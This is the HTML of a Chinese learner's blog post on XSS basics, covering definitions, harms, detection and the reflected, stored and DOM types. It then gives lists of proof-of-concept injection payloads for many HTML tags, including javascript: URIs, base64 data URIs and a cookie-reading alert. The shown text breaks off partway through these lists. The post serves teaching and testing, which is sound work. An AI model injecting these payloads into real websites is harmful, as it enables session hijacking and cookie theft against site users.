  <!DOCTYPE html>
  <html lang="en"  
      data-theme-mode="auto"
  >
  <head>
  <meta charset="utf-8">
  
  
  
  <script>window.REIMU_CONFIG = {};window.REIMU_CONFIG.icon_font = '4552607_4k4bc36ef96';window.REIMU_CONFIG.clipboard_tips = {"success":{"en":"Copy successfully (*^▽^*)"},"fail":{"en":"Copy failed (ﾟ⊿ﾟ)ﾂ"},"copyright":{"enable":false,"count":50,"license_type":"by-nc-sa"}};window.REIMU_CONFIG.clipboard_tips.copyright.content = 'All articles on this blog are licensed under the BY-NC-SA license agreement unless otherwise stated. Please indicate the source when reprinting!';window.REIMU_CONFIG.code_block = {"expand":true};window.REIMU_CONFIG.base = 'https://cl1ck-t0.github.io';</script>
  <title>
    xss基础 | Cl1ck-t0&#39;s blog
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic|Noto Serif SC:400,400italic,700,700italic&display=swap"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic|Noto Serif SC:400,400italic,700,700italic&display=swap" media="print" onload="this.media='all'">
    <link rel="preload" href="//at.alicdn.com/t/c/font_4552607_4k4bc36ef96.woff2" as="font" type="font/woff2" crossorigin="anonymous">
    
<link rel="stylesheet" href="/css/loader.css">

    <meta name="description" content="xss基础一.xss概述1.定义：XSS（Cross Site Scripting）攻击全称跨站脚本攻击，是为不和层叠样式表 (Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。 成因：XSS是一种经常出现在web应用中的计算机安全漏洞，它允许恶意web用户将代码植 入到提供给其它用户使用的页面中，而程序对输入和输出的控制不够严格，导致“精心构造”">
<meta property="og:type" content="article">
<meta property="og:title" content="xss基础">
<meta property="og:url" content="https://cl1ck-t0.github.io/2025/11/23/xss%E5%9F%BA%E7%A1%80/index.html">
<meta property="og:site_name" content="Cl1ck-t0&#39;s blog">
<meta property="og:description" content="xss基础一.xss概述1.定义：XSS（Cross Site Scripting）攻击全称跨站脚本攻击，是为不和层叠样式表 (Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。 成因：XSS是一种经常出现在web应用中的计算机安全漏洞，它允许恶意web用户将代码植 入到提供给其它用户使用的页面中，而程序对输入和输出的控制不够严格，导致“精心构造”">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2025-11-23T15:30:36.000Z">
<meta property="article:modified_time" content="2026-01-04T14:07:10.334Z">
<meta property="article:author" content="Cl1ck-t0">
<meta property="article:tag" content="基础">
<meta name="twitter:card" content="summary">
    <link rel="alternate" href="/atom.xml" title="Cl1ck-t0's blog" type="application/atom+xml">
    <link rel="shortcut icon" href="/images/favicon.ico">
  
<link rel="stylesheet" href="/css/style.css">

  <link rel="preload" as="style" onload="this.onload=null;this.rel='stylesheet'" href="https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.css" integrity="sha384-IfxC36XL/toUyJ939C73PcgMuRzAZuIzZxE38drsmO5p6jD7ei+Zx/1oA/0l8ysE" crossorigin="anonymous">
    
<script src="https://npm.webcache.cn/pace-js@1.2.4/pace.min.js" integrity="sha384-k6YtvFUEIuEFBdrLKJ3YAUbBki333tj1CSUisai5Cswsg9wcLNaPzsTHDswp4Az8" crossorigin="anonymous"></script>

    
<link rel="stylesheet" href="https://npm.webcache.cn/@reimujs/aos@0.1.2/dist/aos.css" integrity="sha384-GMRP93c6Hkz9JVKGAuRR3nTS7M07RwPgTFenXiosjq2VbVgvdDNcz1g6Mkj8AONa" crossorigin="anonymous">

<meta name="generator" content="Hexo 8.1.1"></head>

  <body>
      <div id='loader'>
    <div class="loading-left-bg loading-bg"></div>
    <div class="loading-right-bg loading-bg"></div>
    <div class="spinner-box">
      <div class="loading-taichi rotate">
          <svg width="150" height="150" viewBox="0 0 1024 1024" class="icon" version="1.1" xmlns="https://www.w3.org/2000/svg" shape-rendering="geometricPrecision">
            <path d="M303.5 432A80 80 0 0 1 291.5 592A80 80 0 0 1 303.5 432z" fill="var(--red-1, #ff5252)" />
            <path d="M512 65A447 447 0 0 1 512 959L512 929A417 417 0 0 0 512 95A417 417 0 0 0 512 929L512 959A447 447 0 0 1 512 65z 
           M512 95A417 417 0 0 1 929 512A208.5 208.5 0 0 1 720.5 720.5L720.5 592A80 80 0 0 0 720.5 432A80 80 0 0 0 720.5 592L720.5 720.5A208.5 208.5 0 0 1 512 512A208.5 208.5 0 0 0 303.5 303.5A208.5 208.5 0 0 0 95 512A417 417 0 0 1 512 95z" fill="var(--red-1, #ff5252)" />
          </svg>
      </div>
      <div class="loading-word">Loading...</div>
    </div>
  </div>
  </div>
  <script>
    var time = null;
    var loaderEl = document.getElementById('loader');
    var startLoading = () => {
      time = Date.now();
      loaderEl.classList.remove("loading");
    }
    var hideLoader = () => {
      document.body.style.overflow = 'auto';
      loader.classList.add('loading');
    };

    var endLoading = () => {
      if (!time) {
        hideLoader();
      } else {
        if (Date.now() - time > 500) {
          time = null;
          hideLoader();
        } else {
          setTimeout(endLoading, 500 - (Date.now() - time));
          time = null;
        }
      }
    }
    window.addEventListener('DOMContentLoaded', endLoading);
    loaderEl.addEventListener('click', endLoading);
  </script>
<div id="copy-tooltip"></div>
<div id="heatmap-tooltip"></div>


    <div id="container">
      <div id="wrap">
        <div id="header-nav">
  <nav id="main-nav" aria-label="Primary navigation">
        <a class="main-nav-link-wrap" href="/">
          <span class="main-nav-link">Home</span>
        </span>
        <a class="main-nav-link-wrap" href="/archives">
          <span class="main-nav-link">Archives</span>
        </span>
        <a class="main-nav-link-wrap" href="/about">
          <span class="main-nav-link">About</span>
        </span>
        <a class="main-nav-link-wrap" href="/friend">
          <span class="main-nav-link">Friend</span>
        </span>
    <a id="main-nav-toggle" class="nav-icon" aria-label="Toggle navigation" role="button"></a>
  </nav>
  <nav id="sub-nav" aria-label="Secondary navigation">
      <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed" aria-label="RSS Feed" target="_blank"></a>
  </nav>
</div>
<header id="header" aria-label="Site header">
        <picture>
        </picture>
          <img  fetchpriority="high" src="/images/banner.webp" alt="xss基础">
  <div id="header-outer">
    <div id="header-title">
          <span id="logo">
            <h1 data-aos="slide-up">xss基础</h1>
          </span>
        <h2 id="subtitle-wrap" data-aos="slide-down">
        </h2>
    </div>
  </div>
</header>

        <div id="content" aria-label="Page content"  class="sidebar-right" >
          <aside id="sidebar" aria-label="Sidebar">
  <div class="sidebar-wrapper-container sticky">
  <div class="sidebar-wrapper">
    <div class="sidebar-wrap" data-aos="fade-up">
          <div class="sidebar-toc-sidebar"><h3 class="toc-title">Contents</h3>
<div class="sidebar-toc-wrapper toc-div-class" >
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#xss%E5%9F%BA%E7%A1%80"><span class="toc-number">1.</span> <span class="toc-text">xss基础</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-xss%E6%A6%82%E8%BF%B0"><span class="toc-number">1.1.</span> <span class="toc-text">一.xss概述</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E5%AE%9A%E4%B9%89%EF%BC%9A"><span class="toc-number">1.1.1.</span> <span class="toc-text">1.定义：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-XSS%E5%B8%B8%E8%A7%81%E5%8D%B1%E5%AE%B3"><span class="toc-number">1.1.2.</span> <span class="toc-text">2.XSS常见危害</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-XSS%E6%A3%80%E6%B5%8B%E6%96%B9%E6%B3%95"><span class="toc-number">1.1.3.</span> <span class="toc-text">3.XSS检测方法</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#XSS%E6%BC%8F%E6%B4%9E%E5%B8%B8%E8%A7%81%E4%BD%8D%E7%BD%AE%EF%BC%9A%E5%8F%8D%E9%A6%88%E4%B8%8E%E6%B5%8F%E8%A7%88%E3%80%81%E5%AF%8C%E6%96%87%E6%9C%AC%E7%BC%96%E8%BE%91%E5%99%A8%E3%80%81%E5%90%84%E7%B1%BB%E6%A0%87%E7%AD%BE%E6%8F%92%E5%85%A5%E5%92%8C%E8%87%AA%E5%AE%9A%E4%B9%89%E3%80%81%E7%94%A8%E6%88%B7%E8%B5%84%E6%96%99%E3%80%81-%E5%85%B3%E9%94%AE%E8%AF%8D%E3%80%81%E8%AF%B4%E6%98%8E%E3%80%81%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%AD%89%E5%A4%84"><span class="toc-number">1.1.3.1.</span> <span class="toc-text">XSS漏洞常见位置：反馈与浏览、富文本编辑器、各类标签插入和自定义、用户资料、 关键词、说明、文件上传等处</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E5%88%86%E7%B1%BB"><span class="toc-number">1.2.</span> <span class="toc-text">二.分类</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E5%8F%8D%E5%B0%84%E5%9E%8Bxss"><span class="toc-number">1.2.1.</span> <span class="toc-text">1.反射型xss</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E5%AD%98%E5%82%A8%E5%9E%8Bxss"><span class="toc-number">1.2.2.</span> <span class="toc-text">2.存储型xss</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-DOM%E5%9E%8Bxss"><span class="toc-number">1.2.3.</span> <span class="toc-text">3.DOM型xss</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89-xss%E5%AE%9E%E6%88%98"><span class="toc-number">1.3.</span> <span class="toc-text">三.xss实战</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E5%B8%B8%E7%94%A8%E6%A0%87%E7%AD%BE"><span class="toc-number">1.3.1.</span> <span class="toc-text">1.常用标签</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#0x01-a-%E6%A0%87%E7%AD%BE"><span class="toc-number">1.3.1.1.</span> <span class="toc-text">0x01. a 标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x02-img%E6%A0%87%E7%AD%BE"><span class="toc-number">1.3.1.2.</span> <span class="toc-text">0x02. img标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x03-iframe%E6%A0%87%E7%AD%BE"><span class="toc-number">1.3.1.3.</span> <span class="toc-text">0x03. iframe标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x04"><span class="toc-number">1.3.1.4.</span> <span class="toc-text">0x04. &lt;audio 标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x05"><span class="toc-number">1.3.1.5.</span> <span class="toc-text">0x05. &lt;video标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x06"><span class="toc-number">1.3.1.6.</span> <span class="toc-text">0x06. &lt;svg标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x07-button-%E6%A0%87%E7%AD%BE"><span class="toc-number">1.3.1.7.</span> <span class="toc-text">0x07. button 标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x08-div%E6%A0%87%E7%AD%BE"><span class="toc-number">1.3.1.8.</span> <span class="toc-text">0x08. div标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x09"><span class="toc-number">1.3.1.9.</span> <span class="toc-text">0x09. &lt;object标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x10-script-%E6%A0%87%E7%AD%BE"><span class="toc-number">1.3.1.10.</span> <span class="toc-text">0x10. script 标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x11-p-%E6%A0%87%E7%AD%BE"><span class="toc-number">1.3.1.11.</span> <span class="toc-text">0x11. p 标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x12-input-%E6%A0%87%E7%AD%BE"><span class="toc-number">1.3.1.12.</span> <span class="toc-text">0x12. input 标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x13-details%E6%A0%87%E7%AD%BE"><span class="toc-number">1.3.1.13.</span> <span class="toc-text">0x13. details标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x14"><span class="toc-number">1.3.1.14.</span> <span class="toc-text">0x14. &lt;select 标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x15"><span class="toc-number">1.3.1.15.</span> <span class="toc-text">0x15. &lt;form 标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x16"><span class="toc-number">1.3.1.16.</span> <span class="toc-text">0x16.  &lt;body标签</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E5%B8%B8%E7%94%A8%E7%BB%95%E8%BF%87%E5%A7%BF%E5%8A%BF%E6%B1%87%E6%80%BB"><span class="toc-number">1.3.2.</span> <span class="toc-text">2.常用绕过姿势汇总</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-%E5%85%B3%E9%94%AE%E8%AF%8D%E7%BD%AE%E7%A9%BA%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.2.1.</span> <span class="toc-text">1.关键词置空绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#0x01-%E5%A4%A7%E5%B0%8F%E5%86%99%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.2.1.1.</span> <span class="toc-text">0x01. 大小写绕过</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#0x02-%E5%B5%8C%E5%A5%97%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.2.1.2.</span> <span class="toc-text">0x02. 嵌套绕过</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-%E7%BC%96%E7%A0%81%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.2.2.</span> <span class="toc-text">2.编码绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-html-%E5%AE%9E%E4%BD%93%E7%BC%96%E7%A0%81"><span class="toc-number">1.3.2.2.1.</span> <span class="toc-text">1. html 实体编码</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#2-url-%E7%BC%96%E7%A0%81"><span class="toc-number">1.3.2.2.2.</span> <span class="toc-text">2. url 编码</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#3-js%E7%BC%96%E7%A0%81"><span class="toc-number">1.3.2.2.3.</span> <span class="toc-text">3.js编码</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-%E7%A9%BA%E6%A0%BC%E8%BF%87%E6%BB%A4%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.2.3.</span> <span class="toc-text">3.空格过滤绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-%E5%9C%86%E6%8B%AC%E5%8F%B7%E8%BF%87%E6%BB%A4%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.2.4.</span> <span class="toc-text">4.圆括号过滤绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#5-alert-%E8%BF%87%E6%BB%A4%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.2.5.</span> <span class="toc-text">5.alert 过滤绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#6-%E5%87%BD%E6%95%B0%E6%8B%BC%E6%8E%A5%E7%BB%95%E8%BF%87"><span class="toc-number">1.3.2.6.</span> <span class="toc-text">6.函数拼接绕过</span></a></li></ol></li></ol></li></ol></li></ol>
</div>
</div>
          <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="Cl1ck-t0" class="lazyload">
  <div class="sidebar-author-name">Cl1ck-t0</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>Post</div>
    <div class="sidebar-state-number">12</div>
  </div>
  <div class="sidebar-state-category">
    <div>Category</div>
    <div class="sidebar-state-number">0</div>
  </div>
  <div class="sidebar-state-tag">
    <div>Tag</div>
    <div class="sidebar-state-number">19</div>
  </div>
</div>
<div class="sidebar-social" >
</div>
<div class="sidebar-menu">
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="Home"></a>
        <div class="sidebar-menu-link">Home</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="Archives"></a>
        <div class="sidebar-menu-link">Archives</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="About"></a>
        <div class="sidebar-menu-link">About</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="Friend"></a>
        <div class="sidebar-menu-link">Friend</div>
      </div>
</div>
</div>
          <div class="sidebar-btn-wrapper" style="position:static">
            <div class="sidebar-toc-btn current"></div>
            <div class="sidebar-common-btn"></div>
          </div>
    </div>
  </div>
  <div class="sidebar-widget">
  </div>
  </div>
</aside>

          <section id="main" aria-label="Main content"><article id="post-xss基础" class="h-entry article" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-inner" data-aos="fade-up">
    <div class="article-meta">
      <div class="article-date">
  <span class="article-date-link icon-calendar" data-aos="zoom-in">
    <time datetime="2025-11-23T15:30:36.000Z" itemprop="datePublished">2025-11-23</time>
    <time style="display: none;" id="post-update-time">2026-01-04</time>
  </span>
</div>

    </div>
    
    <div class="hr-line"></div>
    
    <div class="e-content article-entry" itemprop="articleBody">
        <h1 id="xss基础"><a href="#xss基础" class="headerlink" title="xss基础"></a>xss基础</h1><h2 id="一-xss概述"><a href="#一-xss概述" class="headerlink" title="一.xss概述"></a>一.xss概述</h2><h3 id="1-定义："><a href="#1-定义：" class="headerlink" title="1.定义："></a>1.定义：</h3><p>XSS（Cross Site Scripting）攻击全称跨站脚本攻击，是为不和层叠样式表 (Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。</p>
<p>成因：XSS是一种经常出现在web应用中的计算机安全漏洞，它允许恶意web用户将代码植 入到提供给其它用户使用的页面中，而程序对输入和输出的控制不够严格，导致“精心构造” 的脚本输入后，再输到前端时被浏览器当作有效代码解析执行从而产生危害。当受害者访问 这些页面时，浏览器会解析并执行这些恶意代码。</p>
<p>XSS漏洞通常是通过php的输出函数将javascript代码输出到html页面中，通过其他用户本地 浏览器执行的，所以XSS漏洞关键就是寻找参数未过滤的输出函数</p>
<h3 id="2-XSS常见危害"><a href="#2-XSS常见危害" class="headerlink" title="2.XSS常见危害"></a>2.XSS常见危害</h3><p>网络钓鱼，盗取各类用户的账号，如机器登录帐号、用户网银帐号、各类管理员帐号。<br>窃取用户Cookie，获取用户隐私，或者利用用户身份进一步执行操作。<br>劫持用户（浏览器）会话，从而执行任意操作，例如进行非法转账、强制发表日志等。<br>强制弹出广告页面，刷流量等。<br>进行恶意操作，例如任意篡改页面信息，删除文章等，传播跨站脚本蠕虫，网页挂马等。<br>进行基于大量的客户端攻击，如DDOS攻击。<br>结合其它漏洞，如CSRF漏洞，进一步渗透网站。<br>获取客户端信息，例如用户的浏览历史、真实IP、开放端口等。<br>控制受害者机器向其他网站发起攻击。<br>传播跨站脚本蠕虫等。</p>
<h3 id="3-XSS检测方法"><a href="#3-XSS检测方法" class="headerlink" title="3.XSS检测方法"></a>3.XSS检测方法</h3><p>在目标站点上找到输入点，比如查询接口，留言板等<br>输入一组“特殊字符+唯一标识字符”，提交查看返回的源码，是否有做对应的处理<br>通过搜索定位到特征字符，结合特征字符前后语法确定是否可以构造执行js<br>提交构造的脚本代码，查看是否可以成功执行，如果成功执行则说明存在xss漏洞</p>
<h4 id="XSS漏洞常见位置：反馈与浏览、富文本编辑器、各类标签插入和自定义、用户资料、-关键词、说明、文件上传等处"><a href="#XSS漏洞常见位置：反馈与浏览、富文本编辑器、各类标签插入和自定义、用户资料、-关键词、说明、文件上传等处" class="headerlink" title="XSS漏洞常见位置：反馈与浏览、富文本编辑器、各类标签插入和自定义、用户资料、 关键词、说明、文件上传等处"></a>XSS漏洞常见位置：反馈与浏览、富文本编辑器、各类标签插入和自定义、用户资料、 关键词、说明、文件上传等处</h4><h2 id="二-分类"><a href="#二-分类" class="headerlink" title="二.分类"></a>二.分类</h2><blockquote>
<p>[!NOTE]</p>
<p>分为存储型xss、反射型xss、DOM型xss</p>
</blockquote>
<p>下面我们来一一概述()</p>
<h3 id="1-反射型xss"><a href="#1-反射型xss" class="headerlink" title="1.反射型xss"></a>1.反射型xss</h3><p>通过给别人发送带有恶意脚本代码参数的URL， 欺骗用户点击链接，当用户单击时触发，特有的恶意代码参数被HTML解析、执行， 这类跨站的代码通常不存储于服务端。</p>
<p>常见XSS点：网站的搜索栏、用户登录入口、输入表单等地方，漏洞点简单地将用户输入的数据直接或未经过完善的安全过滤就在浏览器中进行输岀，导致输岀的数据中存在可被浏览器执行的代码数据。</p>
<p>特点：非持久化，经过后端，但不存入数据库。</p>
<p>eg.<del>初学还没遇见，后面再补</del>     (XssLab)</p>
<h3 id="2-存储型xss"><a href="#2-存储型xss" class="headerlink" title="2.存储型xss"></a>2.存储型xss</h3><p>比反射型XSS更具有威胁性。恶意代码会存储在服务器中，如在 个人信息或发表文章等地方，加入恶意代码，如果没有过滤或过滤不严，那么这些代码将储存到服务 器中，每当有用户访问该页面的时候都会触发代码执行.</p>
<p>常见XSS点：论坛、博客、留言板、评论、日志等交互处，这些地方有个明显的特征，就是功能页面 .几乎大多数用户都能轻易看到。</p>
<p>区别：存储型XSS和反射型XSS利用方式完全一样。判断存储型XSS只需要重新打开当前页面，若弹 窗还是出现，说明恶意语句被存储在服务器上，即为存储型。</p>
<p>eg.rois2025challenge“我要不停地实践你”两件套</p>
<h3 id="3-DOM型xss"><a href="#3-DOM型xss" class="headerlink" title="3.DOM型xss"></a>3.DOM型xss</h3><p>文档对象模型Document Object Model（DOM）是一个与平台、编程语言不相干的接口，允许程序或脚本动态地访问和更新文档内容、结构和样式，处理后的结果会成为展示页面的一部分</p>
<p>DOM型xss其实是一种特殊类型的反射型xss，也被称作本地跨站，它是基于DOM文档对象模型的一种漏洞。DOM XSS和反射型XSS、存储型XSS的区别在于DOM XSS代码并不需要服务器参与，出发XSS靠的是浏览器的DOM解析，完全是客户端的事情</p>
<p>DOM中有很多对象，其中一些对象可以被用户所操纵，如url，location等。客户端的脚本程序可以通过DOM来动态地检查和修改页面内容，它不依赖于提交数据到服务器端，而是从客户端取得DOM中的数据后并在本地执行，因此仅从服务器端是没有办法防御DOM型XSS漏洞的，如若DOM中的数据没有经过严格的验证，便会产生基于DOM的XSS漏洞。</p>
<p>基于DOM的XSS是反射的特例，其中JavaScript隐藏在URL中，并在其呈现时由页面中的JavaScript取出，而不是在提供服务时嵌入到页面中。这可以使其比其他攻击更隐蔽，并且监控页面正文的WAF或其他防护检测不出恶意内容。</p>
<p>攻击方式：用户请求一个经过专门设计的URL，它由攻击者提交，而且其中包含xss代码。服务器的响应不会以任何的形式包含攻击者的脚本，当用户的浏览器处理这个响应时，DOM对象就会处理xss代码，导致存在xss漏洞。</p>
<p>eg.<del>没见过，见过再补充()</del></p>
<h2 id="三-xss实战"><a href="#三-xss实战" class="headerlink" title="三.xss实战"></a>三.xss实战</h2><h3 id="1-常用标签"><a href="#1-常用标签" class="headerlink" title="1.常用标签"></a>1.常用标签</h3><h4 id="0x01-a-标签"><a href="#0x01-a-标签" class="headerlink" title="0x01. a 标签"></a>0x01. a 标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;javascript:alert(1)&quot;&gt;test&lt;/a&gt;</span><br><span class="line">&lt;a href=&quot;x&quot; onfocus=&quot;alert(&#x27;xss&#x27;);&quot; autofocus=&quot;&quot;&gt;xss&lt;/a&gt;</span><br><span class="line">&lt;a href=&quot;x&quot; onclick=eval(&quot;alert(&#x27;xss&#x27;);&quot;)&gt;xss&lt;/a&gt;</span><br><span class="line">&lt;a href=&quot;x&quot; onmouseover=&quot;alert(&#x27;xss&#x27;);&quot;&gt;xss&lt;/a&gt;</span><br><span class="line">&lt;a href=&quot;x&quot; onmouseout=&quot;alert(&#x27;xss&#x27;);&quot;&gt;xss&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<h4 id="0x02-img标签"><a href="#0x02-img标签" class="headerlink" title="0x02. img标签"></a>0x02. img标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=x onerror=&quot;alert(1)&quot;&gt;</span><br><span class="line">&lt;img src=x onerror=eval(&quot;alert(1)&quot;)&gt;</span><br><span class="line">&lt;img src=1 onmouseover=&quot;alert(&#x27;xss&#x27;);&quot;&gt;</span><br><span class="line">&lt;img src=1 onmouseout=&quot;alert(&#x27;xss&#x27;);&quot;&gt;</span><br><span class="line">&lt;img src=1 onclick=&quot;alert(&#x27;xss&#x27;);&quot;&gt;</span><br></pre></td></tr></table></figure>

<h4 id="0x03-iframe标签"><a href="#0x03-iframe标签" class="headerlink" title="0x03. iframe标签"></a>0x03. iframe标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe src=&quot;javascript:alert(1)&quot;&gt;test&lt;/iframe&gt;</span><br><span class="line">&lt;iframe onload=&quot;alert(document.cookie)&quot;&gt;&lt;/iframe&gt;</span><br><span class="line">&lt;iframe onload=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/iframe&gt;</span><br><span class="line">&lt;iframe onload=&quot;base64,YWxlcnQoJ3hzcycpOw==&quot;&gt;&lt;/iframe&gt;</span><br><span class="line">&lt;iframe onmouseover=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/iframe&gt;</span><br><span class="line">&lt;iframe src=&quot;data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=&quot;&gt;</span><br></pre></td></tr></table></figure>

<h4 id="0x04"><a href="#0x04" class="headerlink" title="0x04. &lt;audio 标签"></a>0x04. &lt;audio 标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;audio src=1 onerror=alert(1)&gt;</span><br><span class="line">&lt;audio&gt;&lt;source src=&quot;x&quot; onerror=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/audio&gt;</span><br><span class="line">&lt;audio controls onfocus=eval(&quot;alert(&#x27;xss&#x27;);&quot;) autofocus=&quot;&quot;&gt;&lt;/audio&gt;</span><br><span class="line">&lt;audio controls onmouseover=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;source src=&quot;x&quot;&gt;&lt;/audio&gt;</span><br></pre></td></tr></table></figure>

<h4 id="0x05"><a href="#0x05" class="headerlink" title="0x05. &lt;video标签"></a>0x05. &lt;video标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;video src=x onerror=alert(1)&gt;</span><br><span class="line">&lt;video&gt;&lt;source onerror=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/video&gt;</span><br><span class="line">&lt;video controls onmouseover=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/video&gt;</span><br><span class="line">&lt;video controls onfocus=&quot;alert(&#x27;xss&#x27;);&quot; autofocus=&quot;&quot;&gt;&lt;/video&gt;</span><br><span class="line">&lt;video controls onclick=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/video&gt;</span><br></pre></td></tr></table></figure>

<h4 id="0x06"><a href="#0x06" class="headerlink" title="0x06. &lt;svg标签"></a>0x06. &lt;svg标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;svg onload=javascript:alert(1)&gt;</span><br><span class="line">&lt;svg onload=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/svg&gt;</span><br></pre></td></tr></table></figure>

<h4 id="0x07-button-标签"><a href="#0x07-button-标签" class="headerlink" title="0x07. button 标签"></a>0x07. button 标签</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;button onclick=alert(1)&gt;</span><br><span class="line">&lt;button onfocus=&quot;alert(&#x27;xss&#x27;);&quot; autofocus=&quot;&quot;&gt;xss&lt;/button&gt;</span><br><span class="line">&lt;button onclick=&quot;alert(&#x27;xss&#x27;);&quot;&gt;xss&lt;/button&gt;</span><br><span class="line">&lt;button onmouseover=&quot;alert(&#x27;xss&#x27;);&quot;&gt;xss&lt;/button&gt;</span><br><span class="line">&lt;button 